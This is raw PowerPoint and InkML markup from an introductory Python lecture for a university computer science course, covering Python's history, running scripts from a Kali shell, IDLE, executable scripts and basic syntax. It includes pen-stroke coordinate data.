  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8938.2688">13352 5834 2 0,'29'3'19'0,"-1"-2"-7"16,4 0 5-16,0-2 10 0,1 0-7 16,3-2 0-16,0 3 0 0,-2-2-3 0,-2 1 5 0,-1-1-11 15,-3 2 1-15,-5-1-1 0,-5 0-2 0,1-1 1 16,-1 1 3-16,-4-2-1 0,-1 2-2 0,2 0 0 15,-3-1-6-15,-1-1 8 0,1 2 0 0,-5 0-8 16,1 0 8-16,0 0-12 0,-3 1-14 0,1-1-13 16,-6 1-20-16,7 1-50 0,-7-1 23 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10287.8258">14101 5177 54 0,'0'-3'69'0,"-2"-1"-14"0,2-1 6 16,-2 1 2-16,-2 0-9 0,4 4-11 0,-2-4 1 15,2 4 4-15,-2-3-4 0,0-1-11 0,2 4-8 16,0 0 1-16,0 0-20 0,-12 4 8 0,2 3-4 16,-7 6 7-16,-7 5-5 0,-3 5-4 0,-9 13 1 15,3 6-5-15,4 3 2 0,-1 3 1 0,4 1 4 16,2 6-4-16,3 0 3 0,4-1-4 0,7-4 10 15,2 4-9-15,4-8-1 0,4-13 2 0,3 2-4 0,2-2-1 16,0-6 0-16,4-3-5 0,1-6-3 16,-1-2-6-16,-1-2 7 0,0-4-4 0,1-2-1 15,-2-1 9-15,1 0 8 0,1-2-5 0,1-4 9 16,2 1 5-16,2-5-4 0,4-1 2 0,8-8-5 0,1-3-1 16,1-2 9-16,2-3-3 0,-2-3 5 0,0-3-7 15,5-11-2-15,-1-3 6 0,-4-1-3 0,0-2-2 16,-6 0-6-16,1-2-3 0,-4 2-3 15,-11 8-35-15,-2 0-13 0,-8 1-12 0,-10 3-79 16,-11 4-148-16,-22 4 66 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11848.0808">9864 7282 55 0,'-4'-2'71'0,"4"2"-7"0,-2-5-19 0,2 5 8 16,-4-1 2-16,4 1-10 0,-3-2-10 0,3 2-2 15,0 0-7-15,0 0 6 0,0 0 2 0,17-2-1 16,-2 4-12-16,4-2-3 0,10 2 3 0,1-1-5 15,6 2-2-15,15 1 2 0,4-1-5 0,2 0 6 16,2 1-1-16,0 1-4 0,-1 1-7 0,3-3 4 16,-1 5 7-16,-1-3-10 0,-2 4-1 0,-2-2-1 15,0 3 4-15,-2-1-13 0,-3 5-9 0,-15-6-14 16,15 6-22-16,-1 1-8 0,-11-3-50 0,-5 2-115 16,2-2 52-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="17023.7542">4604 8618 8 0,'0'0'8'0,"0"0"4"0,0 0-4 16,0 0 2-16,0 0-2 0,-3-3-2 0,3 3-2 15,0 0-1-15,0 0 3 0,0 0-6 0,0 0 8 16,0 0-8-16,0 0 5 0,0 0-4 0,0 0 3 16,9-2 4-16,-9 2-4 0,0 0-1 0,0 0 0 15,0 0-3-15,5-2 2 0,-5 2 0 0,8-1 3 16,-3-1 6-16,4 0 8 0,1-1-6 0,2-1 2 15,2 0 0-15,2-1 1 0,4-2-3 0,0 2 1 16,8-1 5-16,-5 1-11 0,-2-1 8 0,8 3-3 0,0-2 0 16,6 1 2-16,-1-3-9 0,3 2 5 15,1-1 7-15,1 0-4 0,11-4-10 0,-12 6 7 16,16-3-4-16,-17 2-1 0,1-1 0 0,14-1 0 16,-13 3 0-16,-2 0 0 0,2-3-4 0,-5 4 4 0,2 2 0 15,-4-1 2-15,-1 1 1 0,-2 4 2 0,0-2 1 16,2 3-12-16,-2 2-22 0,3 0-54 0,3 7-81 15,-3 0 36-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="21472.1923">5311 10267 2 0,'20'-6'2'0,"-1"4"0"0,2-2 2 15,-4 1 0-15,0 0-5 0,-3 0 1 0,-2 1 1 16,0 0-4-16,-1 2 6 0,-1 0 6 0,0-2-7 16,0 1-1-16,-2 1 2 0,-3-2-2 0,4 2 2 15,-9 0 0-15,9 2 1 0,-1-1-2 0,-2 1-9 16,3-2 8-16,-4 4-7 0,2-1-7 0,-1 2 3 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22674.0226">8247 10071 14 0,'11'11'14'0,"1"2"-2"0,2 0-2 15,-2 1 3-15,3-1 0 0,-1-3 3 0,3 3-3 16,-3-4 0-16,12 4 3 0,-7-2-1 0,5 4 6 16,-5-6-2-16,7 2-1 0,-1 0 0 0,3-2 0 15,2 2-5-15,-3-3 1 0,2 2 7 0,3-4-1 0,4-1 11 16,2-3-2-16,2-2 2 0,-3-1-6 15,14-5 4-15,-14 0 0 0,14-1-1 16,-14-2-1-16,2 1-3 0,-1-3-1 0,12-4-11 0,-1-3 17 16,5 1-13-16,-5-2 5 0,1-1-6 0,-2 1-3 0,-14 4-12 15,1-2 12-15,0-2 4 0,-1 2 1 0,10-7-8 16,-14 5-4-16,1-2 15 0,-3-1-17 0,-1 2 16 16,-3 2-7-16,-4-4-4 0,0 1 15 15,-2 1-9-15,-3-2 3 0,0 0-5 0,-2-3-2 16,0 0 7-16,-3-3-1 0,-1-1 2 0,-2-1-4 0,0 1 6 15,-3-3-3-15,-3-6-6 0,-1-9 3 16,0 0 7-16,0-3-6 0,-5 4 1 0,0-2 2 16,-4-2 3-16,0-1-9 0,-1-1 2 0,-3-1-1 15,-1 1 1-15,-2 3-6 0,-4 0-4 0,0-2 1 0,-4 2 8 16,-6 0-4-16,-2 4-9 0,-5 1-11 0,-4 3 8 16,-2 5 1-16,-3 5 7 0,-8-2-3 0,-1 9-1 15,0 5-14-15,-2-1 3 0,-2 8 8 16,-5 4 3-16,-2 2 0 0,-25 0-4 0,24 13 6 0,-26 1 4 15,2 6-13-15,30 1 1 0,-31 11 6 0,31-6-5 16,-21 15 4-16,0 6-2 0,8 5 5 0,24-14-5 16,-1 3-3-16,5 3 1 0,0 2 1 0,6 0 15 15,5 3-5-15,5 1-13 0,10 2-1 0,8 1 8 16,10 1 1-16,7-1 1 0,9-1-1 0,11 4 4 16,9 1 0-16,19 16-9 0,-12-19 3 0,27 12 2 15,3-3 1-15,2-6-8 0,-15-20 7 0,33 14 3 16,3-6-12-16,-2-4 1 0,0-8 0 0,-5 5-25 15,-23-14-5-15,24 5-17 0,-27-7-13 0,28 10-1 16,-24-12-5-16,23 7-67 0,-25-8-152 0,3-8 68 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23408.7927">13631 5647 10 0,'8'13'4'0,"0"-4"2"0,0-1 4 0,-2-2 5 16,5-1 4-16,0-1 3 0,1-1 1 15,1-2 4-15,-4-4-1 0,4 3 3 0,-3-4 10 0,2 1-11 16,-1-4 6-16,2-4-4 0,2-1-6 0,-2-2-4 16,1-3-1-16,0-2 0 0,-1-5-7 0,-2 2 8 15,-7 4-7-15,1 0-1 0,-3-1-5 0,-1 0 3 16,-5 0 0-16,-1-1-3 0,-1 2-7 0,-8 3-18 15,-2 3-29-15,-12 5-25 0,-8 7-78 0,-26 10 35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772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8100" y="1174750"/>
            <a:ext cx="4229100" cy="3171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4213" y="4522788"/>
            <a:ext cx="5476875" cy="36988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30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9924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646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7509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5442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4939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7025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299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4136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8320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8658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C6EABB9-ACA7-4F7D-AF08-ECFC9DEFEB4F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91825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00180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8703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6620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4393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8100" y="1174750"/>
            <a:ext cx="4229100" cy="3171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4213" y="4522788"/>
            <a:ext cx="5476875" cy="369887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When your script is run by passing it as a command to the Python interpreter,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>python myscript.py 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all of the code that is at indentation level 0 gets executed. Functions and classes that are defined are, well, defined, but none of their code gets run. Unlike other languages, there's no main() function that gets run automatically - the main() function is implicitly all the code at the top level.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4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7490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8474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5756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678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87458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369303" y="6225769"/>
            <a:ext cx="1299316" cy="49570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9DE46-C06E-47BD-980F-552B2EAF619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743" y="3105720"/>
            <a:ext cx="338513" cy="3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2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endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1331913" y="1303338"/>
            <a:ext cx="3095625" cy="12700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196975"/>
            <a:ext cx="220662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6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4648200" y="1293813"/>
            <a:ext cx="3092450" cy="9525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904672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8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x-none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x-none" dirty="0"/>
              <a:t>Haga clic para modificar el estilo de texto del patrón</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" altLang="x-none" dirty="0"/>
              <a:t>Segundo nivel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" altLang="x-none" dirty="0"/>
              <a:t>Tercer nivel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" altLang="x-none" dirty="0"/>
              <a:t>Cuarto nivel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="es-ES" altLang="x-none" dirty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6314" y="6245225"/>
            <a:ext cx="1414486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CFF8CE9-CF61-40DE-9DA2-831B5EF981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1" y="5626100"/>
            <a:ext cx="1057275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77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19163/what-does-if-name-main-d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0" y="406400"/>
            <a:ext cx="9144000" cy="26670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Introduction to Python</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099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602038"/>
            <a:ext cx="6858000" cy="2413000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Xinwen Fu., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Ph.D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Professor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Department of Computer Science</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>University of Massachusetts Lowell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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1" y="5700795"/>
            <a:ext cx="1300162" cy="842881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Python – Taccle3 English sit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519" y="691198"/>
            <a:ext cx="1350962" cy="135096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Motivating game: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Planting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backdoor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History</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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Running Python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Basics &amp; Names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&amp;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Assignment &amp; Loop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Sequences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types: Lists, Tuples, and Strings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Mutability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Function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Exceptions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Hands-on lab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5" name="Picture 4" descr="Python – Taccle3 English sit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240" y="44958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6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Brief History of Python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4846320" cy="464137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3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Invented in the Netherlands, early 90s by Guido van Rossum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Named after Monty Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Open sourced from the beginning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Considered a scripting language, but is much more scalable, object oriented and functional from the beginning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Used by Google from the beginning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Increasingly popular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160" y="1484784"/>
            <a:ext cx="2844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75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History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python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Basics &amp; Names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&amp; Assignment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Sequences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types: Lists, Tuples, and Strings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Mutability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Exceptions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Function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5" name="Picture 4" descr="Dessin Animé Serpent · Images vectorielles gratuites sur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319587"/>
            <a:ext cx="2438400" cy="159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3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Running Interactively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5144616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en-US" sz="2800" i="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>kali@kali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:~$ python3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en-US" sz="2800" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Python 3.9.2 (default, Feb 28 2021, 17:03:44)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en-US" sz="2800" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>[GCC 10.2.1 20210110] on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128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en-US" sz="2800" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Type "help", "copyright", "credits" or "license" for more information.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en-US" sz="2800" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; 3+4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en-US" sz="2800" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>7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en-US" sz="2800" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; exit()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en-US" sz="2800" i="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>kali@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>:~$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000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120000"/>
              </a:lnSpc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Python prompts with ‘&gt;&gt;&gt;’. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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To exit Python (not Idle):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Evaluate exit() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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In Unix, type CONTROL-D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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In Windows, type CONTROL-Z + &lt;Enter&gt;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23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 smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>IDLE Development Environment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IDLE is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>ntegrated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>eve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>opment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>nvironment for Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Multi-window text editor with syntax highlighting, auto-completion, smart indent and other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Python shell with syntax highlighting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Integrated debugger with stepping, breakpoints, etc.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10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Other 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Emacs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</a:rPr>
              <a:t>python-mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>has good support for editing Python, enabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> by default for .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>py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files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>nano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vi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etc.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62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Running Programs/Scripts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32560"/>
            <a:ext cx="8001000" cy="481266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800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Program is the code in a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Call python program via the python interpreter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% python3 fact.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="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800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Make a python file directly executable by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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Adding the appropriate path to your python interpreter as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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the first line of your file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#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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/bin/python3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="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Making the file executable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% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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28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a+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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fact.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Invoking file from Unix command line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en-US" altLang="en-US" sz="30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% ./fact.py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6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How does Running Python Scripts Work?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0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>When you call a python program from the command line, the interpreter evaluates each expression in the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Familiar mechanisms are used to provide command line arguments and/or redirect input and output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Python also has mechanisms to allow a python program to act both as a script and as a module to be imported and used by another python program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204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036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Code Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(basics.py)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#! /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/python3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x = 34 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>23      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 = "Hello"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z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 3.45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z == 3.45 or y == "Hello"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x = x + 1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y = y + " World"   # String concatenation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print(x) # printing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print(y)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956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Results of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>basics.py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kali@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>tst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>$ python3 basics.py </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Hello World</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>kali@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>tst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>$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6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The Python Tutorial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27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Enough to Understand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320"/>
            <a:ext cx="8229600" cy="470884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Indentation matters to code meaning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Block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>structure indicated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>indentation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4 spaces are recommended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First assignment to a variable creates it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Variable types don’t need to be declared.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Python figures out the variable types on its own. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assignment is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and comparison is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - * / % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are as expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for string concatenation and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for string formatting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
